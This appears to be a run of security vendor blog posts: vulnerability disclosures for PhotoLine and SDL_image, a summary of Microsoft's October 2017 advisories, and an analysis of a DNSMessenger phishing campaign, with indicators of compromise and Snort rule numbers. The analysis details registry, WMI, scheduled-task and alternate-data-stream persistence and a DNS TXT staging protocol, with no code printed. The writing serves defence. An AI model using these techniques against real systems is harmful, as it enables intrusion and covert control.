Truevision TGA, often referred to as TARGA, is a raster graphics file format developed in the early eighties and was one of the most commonly used graphical formats in first personal computers. The format is still in use today.

A memory corruption vulnerability exists in the TGA parsing functionality of Computerinsel GmbH Photoline. A specially crafted TGA file can cause a vulnerability resulting in potential code execution. An attacker can send specific TGA file to trigger this vulnerability. Further details can be found here.

Although these vulnerabilities specifically affect Computerinsel PhotoLine image editing software, users of other popular image editing programs are recommended to install latest updates in order to make sure that they are running the latest program versions, which likely contain the fewest number of security vulnerabilities.

Affected versions

The vulnerability has been confirmed in Computerinsel GmbH PhotoLine version 20.02 but it may also exists in previous versions. The vendor has released an updated version of software which can be downloaded from here.

Coverage

The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 43725-43726 (TALOS-2017-0387), 44178-44179 (TALOS-2017-0427), 44451-44452 (TALOS-2017-0458)

Today, Talos is disclosing two vulnerabilities that have been identified in the Simple DirectMedia Layer library. Simple DirectMedia Layer (SDL) is a cross-platform development library designed for use in video playback software, emulators, and games by providing low level access to audio, keyboard, mouse, joystick, and graphics hardware. SDL, via its SDL_image library, also has the capability to handle various image formats such as XCF, the default layered image format for GIMP.

An attacker could compromise a user by exploiting one of these vulnerabilities via a specifically crafted file that SDL would handle, such as a XCF file.

Given that numerous applications make use of SDL, Talos has coordinated with the SDL community to disclose these vulnerabilities and ensure that an updated version of the library is available to use.

Vulnerability Details

Both vulnerabilities highlighted in this post were identified by Yves Younan.

CVE-2017-2887/TALOS-2017-0394 - Simple DirectMedia Layer SDL_image XCF Property Handling Code Execution Vulnerability

A buffer overflow vulnerability has been identified which could lead to arbitrary code execution on an affected host. This vulnerability manifests due to insufficient validation of data read from a file and subsequent use of the data. In this case, the `id` and `length` attributes read from an XCF image file are used without validation, potentially resulting in a stack-based buffer overflow.

CVE-2017-2888/TALOS-2017-0395 - Simple DirectMedia Layer Create RGB Surface Code Execution Vulnerability

An integer overflow vulnerability has been identified which could lead to arbitrary code execution on an affected host. This vulnerability manifests when creating a new RGB surface via a call to the `CreateRGBSurface` function. A sufficiently large width and height value passed to this function could cause a multiplication operation to overflow, thus resulting in too little memory being allocated. Subsequent writes would then be out-of-bounds.

For the full technical details of these vulnerabilities, please visit the Vulnerability Reports portal on our website.

Coverage

Talos has released the following Snort rules to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules: 43855-43856, 43858, 43860

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 63 new vulnerabilities with 28 of them rated critical and 35 rated important. These vulnerabilities impact Graphics, Edge, Internet Explorer, Office, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more.

Vulnerabilities Rated Critical

The following vulnerabilities are rated "Critical" by Microsoft:

• CVE-2017-11813 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-11822 - Internet Explorer Memory Corruption Vulnerability
• CVE-2017-11762 - Microsoft Graphics Remote Code Execution Vulnerability
• CVE-2017-11763 - Microsoft Graphics Remote Code Execution Vulnerability
• CVE-2017-11797 - Scripting Engine Information Disclosure Vulnerability
• CVE-2017-11767 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11792 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11793 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11796 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11798 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11799 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11800 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11801 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11802 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11804 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11805 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11806 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11807 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11808 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11809 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11810 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11811 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11812 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11821 - Scripting Engine Memory Corruption Vulnerability
• CVE-2017-11779 - Windows DNSAPI Remote Code Execution Vulnerability
• CVE-2017-11771 - Windows Search Remote Code Execution Vulnerability
• CVE-2017-8727 - Windows Shell Memory Corruption Vulnerability
• CVE-2017-11819 - Windows Shell Remote Code Execution Vulnerability

CVE-2017-11813, CVE-2017-11822 - Internet Explorer Memory Corruption Vulnerability

Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.

CVE-2017-11762, CVE-2017-11763 - Microsoft Graphics Remote Code Execution Vulnerability

Two vulnerabilities have been identified in the font library of the Microsoft Graphics Component that could allow an attacker to execute arbitrary code. These vulnerabilities manifest due to the library incorrectly handling specialty embedded fonts within a web page or document. Exploitation of these two vulnerabilities could be achieved if a user navigates to a malicious web page or if the user opens a specially crafted document that exploits these vulnerabilities.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability

Multiple vulnerabilities have been identified in the scripting engines of Edge and Internet Explorer that could allow an attacker to remotely execute arbitrary code. These vulnerabilities all manifest due to the scripting engines in Edge and Internet Explorer improperly handling objects in memory. As a result, successful exploitation could lead to arbitrary code execution in the context of the current user. Scenarios where these vulnerabilities would likely be exploited include web-based attacks where the user navigates to a malicious web page designed to exploit of these vulnerabilities or, in some cases, opens a Microsoft Office document containing an embedded ActiveX control marked "safe for initialization."

The following is a list of CVEs related to these vulnerabilities:

• CVE-2017-11767
• CVE-2017-11792
• CVE-2017-11793
• CVE-2017-11796
• CVE-2017-11797
• CVE-2017-11798
• CVE-2017-11799
• CVE-2017-11800
• CVE-2017-11801
• CVE-2017-11802
• CVE-2017-11804
• CVE-2017-11805
• CVE-2017-11806
• CVE-2017-11807
• CVE-2017-11808
• CVE-2017-11809
• CVE-2017-11810
• CVE-2017-11811
• CVE-2017-11812
• CVE-2017-11821

CVE-2017-11779 - Windows DNSAPI Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Windows DNS that could allow an attacker to execute arbitrary code in the context of the Local System account. This vulnerability manifests in DNSAPI.dll as a result of improperly handling DNS responses. A scenario where this vulnerability could be exploited would be one where an attacker stand ups a malicious DNS server to transmit specially crafted DNS responses to the target.

CVE-2017-11771 - Windows Search Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Window Search that could allow an attacker to elevate their privileges and subsequently execute code in the elevated context. This vulnerability manifests due to improper handling of objects in memory. For this vulnerability to be exploited, an attacker would need to either have access to the targeted host to exploit this vulnerability, or remotely trigger it through an SMB connection.

CVE-2017-8727 - Windows Shell Memory Corruption Vulnerability

A remote code execution vulnerability has been identified in Internet Explorer which could allow an attacker to execute arbitrary code in the context of the current user. This vulnerability manifests as a result of Internet Explorer improperly accessing objects in memory via the Microsoft Windows Text Services Framework. An attacker could create a specially crafted web page that exploits this vulnerability and subsequently socially engineer a user to visit the page to compromise users. Additionally, attackers could leverage vulnerable or compromised websites or sites that display user-provided content or advertisements to exploit and compromise users.

CVE-2017-11819 - Windows Shell Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Microsoft web browsers which manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code in the context of the current user. An attacker could leverage this vulnerability to exploit users by crafting a specially formed web page and socially engineering users to visit such a page. Other scenarios include an attacker leveraging vulnerable or compromised websites or sites that display user-provided content or advertisements to exploit this vulnerability and compromise users.

Vulnerabilities Rated Important

The following vulnerabilities are rated "important" by Microsoft:

• CVE-2017-11790 - Internet Explorer Information Disclosure Vulnerability
• CVE-2017-11794 - Microsoft Edge Information Disclosure Vulnerability
• CVE-2017-8726 - Microsoft Edge Memory Corruption Vulnerability
• CVE-2017-8693 - Microsoft Graphics Information Disclosure Vulnerability
• CVE-2017-8717 - Microsoft JET Database Engine Remote Code Execution Vulnerability
• CVE-2017-8718 - Microsoft JET Database Engine Remote Code Execution Vulnerability
• CVE-2017-11826 - Microsoft Office Memory Corruption Vulnerability
• CVE-2017-11825 - Microsoft Office Remote Code Execution Vulnerability
• CVE-2017-11775 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11777 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11820 - Microsoft Office SharePoint XSS Vulnerability
• CVE-2017-11776 - Microsoft Outlook Information Disclosure Vulnerability
• CVE-2017-11774 - Microsoft Outlook Security Feature Bypass Vulnerability
• CVE-2017-11772 - Microsoft Search Information Disclosure Vulnerability
• CVE-2017-11823 - Microsoft Windows Security Feature Bypass
• CVE-2017-11786 - Skype for Business Elevation of Privilege Vulnerability
• CVE-2017-11769 - TRIE Remote Code Execution Vulnerability
• CVE-2017-8689 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-8694 - Win32k Elevation of Privilege Vulnerability
• CVE-2017-11783 - Windows Elevation of Privilege Vulnerability
• CVE-2017-11816 - Windows GDI Information Disclosure Vulnerability
• CVE-2017-11824 - Windows Graphics Component Elevation of Privilege Vulnerability
• CVE-2017-11817 - Windows Information Disclosure Vulnerability
• CVE-2017-11765 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11784 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11785 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-11814 - Windows Kernel Information Disclosure Vulnerability
• CVE-2017-8715 - Windows Security Feature Bypass Vulnerability
• CVE-2017-11781 - Windows SMB Denial of Service Vulnerability
• CVE-2017-11782 - Windows SMB Elevation of Privilege Vulnerability
• CVE-2017-11815 - Windows SMB Information Disclosure Vulnerability
• CVE-2017-11780 - Windows SMB Remote Code Execution Vulnerability
• CVE-2017-11818 - Windows Storage Security Feature Bypass Vulnerability
• CVE-2017-8703 - Windows Subsystem for Linux Denial of Service Vulnerability
• CVE-2017-11829 - Windows Update Delivery Optimization Elevation of Privilege Vulnerability

CVE-2017-11790 - Internet Explorer Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Internet Explorer that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Internet Explorer improperly handling objects in memory. A user who navigates to an attacker-controlled web page could be exploited. Additionally, users who navigate to site that hosts user-generated content could also be exploited.

CVE-2017-11794 - Microsoft Edge Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Edge that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Edge improperly handling objects in memory. A user who navigates to an attacker-controlled web page could be exploited. Additionally, users who navigate to site that hosts user-generated content could also be exploited.

CVE-2017-8726 - Microsoft Edge Memory Corruption Vulnerability

A remote code execution vulnerability has been identified in Edge that could allow an attacker to execute arbitrary code in the context of the user. This vulnerability manifests due to Edge improperly handling objects in memory. Possible scenarios where an attacker could compromise a user could include a web-based attacks where a user navigates to a specially crafted web page under the attacker's control. Other possibilities include a user opening a Microsoft Office document containing an embedded ActiveX control marked "safe for initialization".

CVE-2017-8693 - Microsoft Graphics Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Microsoft Windows Graphics Component that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the Graphics component improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-8717, CVE-2017-8718 - Microsoft JET Database Engine Remote Code Execution Vulnerability

Two arbitrary code execution vulnerabilities have been identified in the Microsoft JET Database Engine that could allow an attacker to execute arbitrary code in the context of the current user. These vulnerabilities manifest as buffer overflow conditions when triggered. For an attacker to successfully exploit these vulnerabilities, a user would need to open or preview a specially crafted Microsoft Excel document on an affected version of Windows. An email-based attack where an attacker sends a victim a specially crafted Excel document is the most likely scenario where a user could be compromised.

CVE-2017-11826 - Microsoft Office Memory Corruption Vulnerability

A vulnerability have been identified in Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that in certain conditions, the Preview Pane is an attack vector as well.

CVE-2017-11825 - Microsoft Office Remote Code Execution Vulnerability

A vulnerability has been identified in Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A users who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.

Multiple CVEs - Microsoft Office SharePoint XSS Vulnerability

Multiple vulnerabilities in Microsoft Office Sharepoint have been identified that could could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to Sharepoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute scripts in the context of the current user, read content that the attacker would not otherwise have permission to view, or execute actions on behalf of the affected user.

The following CVEs reflect these vulnerabilities:

• CVE-2017-11775
• CVE-2017-11777
• CVE-2017-11820

CVE-2017-11776 - Microsoft Outlook Information Disclosure Vulnerability

An information disclosure vulnerability in Microsoft Outlook has been identified that could leak sensitive information to third-parties. This vulnerability manifests when Outlook fails to establish a secure connection. An attacker who exploits this vulnerability could obtain the email content of a user.

CVE-2017-11774 - Microsoft Outlook Security Feature Bypass Vulnerability

A security feature bypass vulnerability has been identified in Microsoft Outlook that could be used to execute arbitrary commands. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a specially crafted document file could be exploited. A scenario where this could occur would be in a file-sharing attack where an attacker gives the user a file and socially engineers them to open it.

CVE-2017-11772 - Microsoft Search Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows Search that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to Window Search improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user sends specially crafted messages to the Window Search service. Alternatively, this vulnerability could be exploited remotely in an enterprise setting over an SMB connection from an unauthenticated attacker.

CVE-2017-11823 - Microsoft Windows Security Feature Bypass

A vulnerability had been identified in Device Guard that could allow an attacker bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could be run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-11786 - Skype for Business Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Skype for Business that could allow an authenticated attacker to potentially impersonate a user. This vulnerability manifests due to Skype for Business improperly handling specific authentication requests. An attacker who initiates an instant message session while a specially crafted profile image is set could exploit this vulnerability and steal an authentication hash that could be reused in different contexts. Successful exploitation would allow an attacker to perform actions that a user is permitted to do, resulting in various outcomes such as privilege escalation.

CVE-2017-11769 - TRIE Remote Code Execution Vulnerability

An arbitrary code execution vulnerability has been identified in Windows that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to the way certain Windows components improperly handle loading DLL files. Successful exploitation could allow an attacker to perform actions or execute commands within the context of the current user.

CVE-2017-8689, CVE-2017-8694 - Win32k Elevation of Privilege Vulnerability

Two vulnerabilities in Windows Kernel-Mode Drivers have been identified that could allow a privilege escalation attack to occur. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in an attacker obtaining administrator privileges on the targeted system. Users who run a specifically crafted executable that exploits this vulnerability could leverage this vulnerability to perform actions as an administrator on the affected system.

CVE-2017-11783 - Windows Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Windows that could allow an authenticated attacker to elevate their privileges to that of an administrator. This vulnerability manifests due to Windows improperly handling calls to Advanced Local Procedure Call (ALPC). A user who creates a specially crafted application and executes it on an affected system could exploit this vulnerability.

CVE-2017-11816 - Windows GDI Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Microsoft Windows Graphics Device Interface (GDI) that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the GDI improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11824 - Windows Graphics Component Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in the Microsoft Windows Graphics Component that could allow an attacker to elevate their privileges to that of an administrator. This vulnerability manifests due to the Graphics component improperly handling objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11817 - Windows Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to obtain information that could be used to further compromise an affected system. This vulnerability manifests due to the kernel improperly initializing objects in memory. Exploitation of this vulnerability could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit this vulnerability.

CVE-2017-11784, CVE-2017-11785 - Windows Kernel Information Disclosure Vulnerability

Two information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to obtain memory addresses and bypass Kernel Address Space Layout Randomization (KASLR). Exploitation of these vulnerabilities could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit them.

CVE-2017-11765, CVE-2017-11814 - Windows Information Disclosure Vulnerability

Two information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to obtain information that could be used to further compromise an affected system. These vulnerabilities manifest due to the kernel improperly initializing objects in memory. Exploitation of these vulnerabilities could be achieved if an authenticated user were to launch a specially crafted executable designed to exploit them.

CVE-2017-8715 - Windows Security Feature Bypass Vulnerability

A vulnerability had been identified in Device Guard that could allow an attacker to bypass a security control and inject malicious code into a Windows Powershell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could be run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-11781 - Windows SMB Denial of Service Vulnerability

A denial of service vulnerability has been identified in Microsoft SMB that could allow an attacker to crash an affected host. This vulnerability manifests due to SMB improperly handling certain requests. An attacker who sends a vulnerable server specially crafted requests could exploit this vulnerability and create a denial of service condition for users.

CVE-2017-11782 - Windows SMB Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in the default Windows SMB Server configuration that could allow anonymous users to access certain named pipes. These named pipes could be used to send specially crafted requests to services that accept requests via named pipes. An attacker who is able to send SMB messages to an affected SMB server could exploit this vulnerability.

CVE-2017-11815 - Windows SMB Information Disclosure Vulnerability

An information disclosure vulnerability has been identified in Windows SMB that could allow an attacker to access files they otherwise should not have access to. This vulnerability manifests due to SMB server improperly handling certain requests. An attacker who is able to authenticate to the SMB server and send it SMB messages could exploit this vulnerability.

CVE-2017-11780 - Windows SMB Remote Code Execution Vulnerability

A remote code execution vulnerability has been identified in Microsoft Server Message Block 1.0 (SMBv1) which could allow an attacker to compromise SMBv1 servers. This vulnerability manifests due to the way SMBv1 servers handle certain requests. Exploitation of this vulnerability could be achieved by an unauthenticated attacker by sending specially crafted requests to the affected server.

CVE-2017-11818 - Windows Storage Security Feature Bypass Vulnerability

A security feature bypass has been identified in Microsoft Windows storage which could allow an application with a certain integrity level to execute code at a different level. This vulnerability manifests due to Windows improperly validating an integrity-level check.

CVE-2017-8703 - Windows Subsystem for Linux Denial of Service Vulnerability

A denial of service vulnerability has been identified in the Windows Subsystem for Linux (WSL). This vulnerability manifests as due to the WSL improperly handling objects in memory. An attacker who creates a specially crafted application and executes it on an affected system could exploit this vulnerability.

CVE-2017-11829 - Windows Update Delivery Optimization Elevation of Privilege Vulnerability

A privilege escalation vulnerability has been identified in Windows Update Delivery Optimization that could allow an attacker to overwrite files of a higher privilege than what the attacker possesses. This vulnerability manifests due to Windows Update Delivery Optimization improperly enforcing file share permissions. An attacker who is able to log into the system and create a Delivery Optimization job could exploit this vulnerability.

Coverage

In response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rules:

• 44333-44334
• 44508-44519
• 44526-44529
• 44532-44533

This post was authored by Edmund Brumaghin, Colin Grady, with contributions from Dave Maynor and @Simpo13.

Executive Summary

Cisco Talos previously published research into a targeted attack that leveraged an interesting infection process using DNS TXT records to create a bidirectional command and control (C2) channel. Using this channel, the attackers were able to directly interact with the Windows Command Processor using the contents of DNS TXT record queries and the associated responses generated on the attacker-controlled DNS server.

We have since observed additional attacks leveraging this type of malware attempting to infect several target organizations. These attacks began with a targeted spear phishing email to initiate the malware infections and also leveraged compromised U.S. state government servers to host malicious code used in later stages of the malware infection chain. The spear phishing emails were spoofed to make them appear as if they were sent by the Securities and Exchange Commission (SEC) in an attempt to add a level of legitimacy and convince users to open them. The organizations targeted in this latest malware campaign were similar to those targeted during previous DNSMessenger campaigns. These attacks were highly targeted in nature, the use of obfuscation as well as the presence of a complex multi-stage infection process indicates that this is a sophisticated and highly motivated threat actor that is continuing to operate.

Technical Details

The emails associated with this malware campaign were spoofed to make them appear as if they had originated from the Securities and Exchange Commission (SEC) Electronic Data Gathering, Analysis, and Retrieval (EDGAR) system. For those not familiar with this system, EDGAR is an automated filing platform that organizations can use to submit filings which are legally required to be performed by publicly traded companies. This was likely done to increase the perceived legitimacy of the emails and increase the chances that the recipient would open the email and associated attachments.

The emails themselves contained a malicious attachment that when opened would initiate a sophisticated multi-stage infection process leading to infection with DNSMessenger malware. The malicious attachments were Microsoft Word documents. Rather than leveraging macros or OLE objects, which are some of the most common ways that Microsoft Word documents are leveraged to execute code, these attachments leveraged Dynamic Data Exchange (DDE) to perform code execution. A description of this technique has been published here. This technique has recently been publicized following a Microsoft decision that this functionality is a feature by design and will not be removed. We are now seeing it actively being used by attackers in the wild, as demonstrated in this attack.

Similar to the emails described above, the malicious attachments were made to appear as if they had originated from the SEC and include logos and branding as well as information that would be expected from any documents received from the SEC. When opened, victims would be greeted with a message informing them that the document contains links to external files, and asking them to allow/deny the content to be retrieved and displayed.


In the case of this attack, if the user allows the external content to be retrieved, the malicious document will reach out to attacker hosted content to retrieve code that will be executed to initiate the malware infection. Interestingly, the DDEAUTO field used by this malicious document retrieved code that the attacker had initially hosted on a Louisiana state government website, which was seemingly compromised and used for this purpose. The DDEAUTO command that is executed is below:

The aforementioned command results in the code hosted at the referenced URL to be downloaded and executed directly using Powershell. The contents of the code that is retrieved from the server is Powershell code and includes a code blob that is both Base64 encoded and gzipped. The code is retrieved, deobfuscated, then passed to the Invoke-Expression (IEX) cmdlet and executed by Powershell.

The deobfuscated code is responsible for staging and kicking off subsequent stages of the infection process. It is also responsible for achieving persistence on systems. The code features a number of ways that persistence may be achieved depending on the operating environment of the malware. It determines the version of Powershell on the infected system as well as the access privileges of the user to determine how to proceed with achieving this persistence.

First, a blob of code called $ServiceCode, which is also both base64 encoded and compressed using gzip, is written to the Windows registry using the following Powershell command:

A second block of code present in the Powershell is called $stagerCode and is responsible for extracting and decoding the code that was previously stored in the registry, then executing this code, first checking for the presence of the mutex '1823821749'. If this mutex does not exist, execution continues.

The malware then attempts to write the contents of $stagerCode along with the appropriate PowerShell command to execute it to the following registry locations, creating a new registry key called "IE"

• HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
• HKLM:\Software\Microsoft\Windows\CurrentVersion\RunServices
• HKCU:\Software\Microsoft\Windows\CurrentVersion
• HKEY_USERS\.Default\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
• HKLM:\System\CurrentControlSet\Services\VxD
• HKCR:\vbsfile\shell\open\command

The malware also creates a new scheduled task called "IE" that is responsible for executing $stagerCode each time the system boots, using a random startup delay period.

The malware then queries the system to determine the characteristics of the environment in which it is operating to determine how to proceed. It specifically checks the version of Powershell that is installed on the system. If the system is running a Powershell version later than Powershell 2.0, the malware will write the contents of $ServiceCode to an Alternate Data Stream (ADS) of the the following file location:

        %PROGRAMDATA%\Windows\kernel32.dll

The malware then checks to determine the privilege level of the user that was infected. If the user has administrative privileges on the infected system, it will set up a WMI event consumer and filter as an additional WMI-based persistence mechanism. The filter name is "kernel32_filter" and the consumer name is "kernel32_consumer". The Powershell code used for the performance of these tasks is below:

Once all of these tasks have completed, the malware then enters the next stage of the infection process by executing $stagerCode directly using the IEX Powershell cmdlet.

This next stage of the malware infection was heavily obfuscated with both variables and function names obscured. Most of the strings within this code were also base64 encoded. The code associated with this stage starts by defining an array containing a list of domains that will be used for subsequent Command and Control (C2) communications. A list of the domains in this array is included in the Indicators of Compromise section of this blog.

The malware also obtains the serial number of the system from the BIOS. It calculates the MD5 hash of the serial number and returns the first ten bytes.

• Example S/N: VMware-56 4d 64 66 d0 7d f4 26-2c ad a5 8b f8 51 26 f8
• Resulting Value: EFA29DD310

The malware then sets a counter value to zero. The aforementioned hash value, the hardcoded string "stage", the value of the counter, and a randomly selected domain from the array are then combined to create the initial hostname that will be used by the malware to start making DNS requests.

• Example Hostname: EFA29DD310.stage.0.ns0.pw

At this point the malware enters a loop which will continue until it receives an A record lookup result of 0.0.0.0 or any lookup fails entirely. The A record result represents a checksum value, which will be explained below. The IPv4 value returned by the DNS server in response to the A record request is then converted to an integer, then a binary number.

• Example IP: 107.50.99.116
• Integer Value: 1798464372
• Binary: 1101011001100100110001101110100

The same generated hostname is then used by the malware to make a TXT record request. The result of the TXT record query is then used to calculate an MD5 hash and the first eight bytes of the MD5 hash are then run through a checksum algorithm that returns an integer value which is converted into a binary number.

• Example TXT Query Result:

H4sIAIia3VkC/909a1fbSJafyTn5DxXhbkvYEpg8pgcjpnnkwXQgLNCTnnG8HdkqQGBLjiRDCPE5+x/2H+4v2XvrpdLLmE7m9J6lZ8BWVd133br3VpWyTE4vgoQkdJgGUUiSi2g68smAkmg8DlLqEy8hQUqgyySmCQ3hY0hOUu+cxo8fLRP3e/48ftTwo7EXhAlxyc+mESZrzuTGaLMPCVAjP068ofx8QweqpeMgjYn4rLesay1PM1BPNV

• MD5: 432B4077F72EE96CA70B57F10B68F35E
• Selected Bytes: 432B4077
• Checksum: 1126908023
• Binary: 1000011001010110100000001110111

Once the malware has both the binary values from the A record response and the above checksum calculation, they are compared. If the A record response and the TXT record response match, the result of the TXT record query response is appended to the end of a final resulting string, a new domain is then randomly selected from the array and the counter value previously mentioned, and included in the hostname used for queries, is incremented by one. If they don't match, the queries continue in kind until they do.

This process continues until the result of the A record lookup is 0.0.0.0, which indicates a completion of the code collection via DNS, at which time the resulting string is returned for further processing. This result string is then decoded using Base64 and decompressed using gzip. It is then passed to the Powershell IEX cmdlet to execute the code that was retrieved using DNS.

During analysis of this specific attack, we were unable to obtain this next stage of Powershell code from the C2 servers. Given the targeted nature of this attack it is likely that the attacker is restricting these communications in an attempt to evade analysis by information security companies and researchers. It's been reported that the stage 4 payload is documented here.

Conclusion

 

This attack shows the level of sophistication that is associated with threats facing organizations today. Attackers often employ multiple layers of obfuscation in an attempt to make analysis more difficult, evade detection and prevention capabilities, and continue to operate under the radar by limiting their attacks to only the organizations that they are targeting. It is also important for organizations to be aware of some of the more interesting techniques that malware is using to execute malicious code on systems and gain persistence on systems once they are infected. In this particular case, the malware featured the capability to leverage WMI, ADS, scheduled tasks, as well as registry keys to obtain persistence. The use of DNS as a conveyance for later stage code and C2 communications is also becoming more and more commonplace. Talos continues to monitor the threat landscape for unique and targeted attacks such as this one so that customers remain protected as attackers change the techniques they use to perform their malicious activities.

Coverage

Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNGFW,NGIPS, andMeraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise (IOCs)

The following Indicators of Compromise (IOCs) are associated with the attack described in this blog post.

Malicious Word Documents:

1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb

Stage 2 PowerShell

8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
ec3aee4e579e0d1db922252f9a15f1208c4f9ac03bd996af4884725a96a3fdf6

Domains:

trt[.]doe[.]louisiana[.]gov
ns0[.]pw
ns0[.]site
ns0[.]space
ns0[.]website
ns1[.]press
ns1[.]website
ns2[.]press
ns3[.]site
ns3[.]space
ns4[.]site
ns4[.]space
ns5[.]biz
ns5[.]online
ns5[.]pw

IP Addresses:

206[.]218[.]181[.]46

This post was authored by Paul Rascagneres.

Introduction

